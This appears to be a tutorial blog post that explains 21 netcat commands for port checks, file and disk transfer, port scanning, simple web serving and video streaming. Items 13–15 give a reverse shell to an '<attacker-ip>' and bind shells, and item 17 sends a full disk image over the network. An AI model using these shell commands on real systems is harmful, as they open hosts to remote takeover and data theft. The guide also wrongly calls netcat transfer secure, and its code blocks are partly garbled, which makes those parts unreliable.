Netcat, often referred to as nc, is a powerful networking utility in Linux that allows users to manage network connections, transfer files, and perform network diagnostics. This guide will explore each of the netcat commands presented in the image, providing detailed explanations and examples.
Basic Network Operations
1. nc 10.0.0.10 80
Description: Test if the remote TCP port is open (use -u for UDP).
Example:
##
###
nc 10.0.0.10 80
This command attempts to connect to port 80 on the IP address 10.0.0.10. If the connection is successful, the port is open.
2. nc -l 1234
Description: Set up a TCP server listening on port 1234 (use -u for UDP).
Example:
##
###
nc -l 1234
This command sets up a TCP server that listens for incoming connections on port 1234.
3. nc -k -l 1234
Description: Keep netcat listener alive after the current connection dies.
Example:
##
###
nc -k -l 1234
This command keeps the netcat listener alive on port 1234, even after a connection is closed.
File Transfer
4. nc 10.0.0.10 1234 < my.tgz
Description: Transfer file to remote endpoint via netcat.
Example:
##
###
nc 10.0.0.10 1234 < my.tgz
This command sends the my.tgz file to the IP address 10.0.0.10 on port 1234.
5. cat my.tgz | nc 10.0.0.10 1234
Description: Transfer file to remote endpoint via netcat using cat.
Example:
##
###
cat my.tgz | nc 10.0.0.10 1234
This is another way to send the my.tgz file using a pipe.
6. nc -l 1234 > my.tgz
Description: Receive and save file via netcat.
Example:
##
###
nc -l 1234 > my.tgz
This command sets up a listener on port 1234 to receive a file and save it as my.tgz.
Advanced File Operations
7. tar -cf – . | nc -v 10.0.0.10 1234
Description: Create a tarball and pipe it to netcat.
Example:
##
###
tar -cf – . | nc -v 10.0.0.10 1234
This command creates a tarball of the current directory and sends it to 10.0.0.10 on port 1234.
8. nc -lv 1234 | tar -xvf –
Description: Receive a tarball and extract it in the current directory.
Example:
##
###
nc -lv 1234 | tar -xvf –
This command listens on port 1234, receives a tarball, and extracts it in the current directory.
Network Scanning
9. nc -z 10.0.0.10 1-1000
Description: Scan a range of ports for a target (e.g., 1 to 1000).
Example:
##
###
nc -z 10.0.0.10 1-1000
This command scans ports 1 through 1000 on the IP address 10.0.0.10 to see which ones are open.
10. nc -z 10.0.0.10 1-100 200-300
Description: Scan multiple ranges of ports.
Example:
##
###
nc -z 10.0.0.10 1-100 200-300
This command scans two ranges of ports, 1 to 100 and 200 to 300, on the IP address 10.0.0.10.
11. nc -vuz -w1 10.0.0.10 1-1000
Description: Scan a range of UDP ports with a 1-second timeout.
Example:
##
###
nc -vuz -w1 10.0.0.10 1-1000
This command scans UDP ports 1 to 1000 on 10.0.0.10, with a timeout of 1 second for each port.
HTTP Requests and Shells
12. printf “GET / HTTP/1.0\r\n\r\n” | nc google.com 80
Description: Send an HTTP request.
Example:
##
###
printf “GET / HTTP/1.0\r\n\r\n” | nc google.com 80
This command sends a basic HTTP GET request to google.com on port 80.
13. nc <attacker-ip> 4444 -e /bin/##
Description: Create a reverse shell on the target host.
Example:
##
###
nc <attacker-ip> 4444 -e /bin/##
This command sets up a reverse shell that connects to the attacker’s IP on port 4444.
14. nc -l 4444 -e /bin/##
Description: Create a bind shell on the target host.
Example:
##
###
nc -l 4444 -e /bin/##
This sets up a shell that listens for connections on port 4444.
15. nc -k -l 4444 -e /bin/##
Description: Create a persistent netcat listener for bind shell.
Example:
##
###
nc -k -l 4444 -e /bin/##
This command keeps the bind shell listener alive on port 4444.
16. nc -l 12345 -c ‘uptime’
Description: Run a command and redirect output to client.
Example:
##
###
nc -l 12345 -c ‘uptime’
This sets up a listener on port 12345 that runs the uptime command and sends the output to the connecting client.
Disk and Data Management
17. dd if=/dev/sdb | gzip -c | nc 10.0.0.10 1234
Description: Transfer a gzipped hard drive out.
Example:
##
###
dd if=/dev/sdb | gzip -c | nc 10.0.0.10 1234
This command reads from /dev/sdb, compresses it with gzip, and sends it to 10.0.0.10 on port 1234.
18. nc -l 1234 | sudo dd of=/backup/sdb.img.gz
Description: Save transferred hard drive image.
Example:
##
###
nc -l 1234 | sudo dd of=/backup/sdb.img.gz
This command listens on port 1234 and writes the received data to /backup/sdb.img.gz.
Web and Streaming
19. while true; do nc -l 8000 < test.html; done
Description: Serve a static web page.
Example:
##
###
while true; do nc -l 8000 < test.html; done
This sets up a simple HTTP server that serves test.html on port 8000.
20. mkdir /tmp/pipe; cat video.mp4 > /tmp/pipe & nc -ul 12345 < /tmp/pipe
Description: Start streaming the video upon client connection.
Example:
##
###
mkdir /tmp/pipe; cat video.mp4 > /tmp/pipe & nc -ul 12345 < /tmp/pipe
This command streams video.mp4 using UDP on port 12345.
21. nc -u 10.0.0.10 12345 | mplayer –
Description: Receive and play video stream with mplayer.
Example:
##
###
nc -u 10.0.0.10 12345 | mplayer –
This command receives a video stream from 10.0.0.10 on port 12345 and plays it using mplayer.
Detailed Examples and Use Cases
File Transfer
For secure and fast file transfer between two systems, use netcat. Here is how you can send a tarball of a directory:
Sender:
##
###
tar -cf – . | nc -v 10.0.0.10 1234
Receiver:
##
###
nc -lv 1234 | tar -xvf –
Port Scanning
Netcat can be used to scan open ports on a remote system, useful for security assessments.
Scan TCP ports 1-1000:
##
###
nc -z 10.0.0.10 1-1000
Scan UDP ports 1-1000 with a 1-second timeout:
##
###
nc -vuz -w1 10.0.0.10 1-1000
“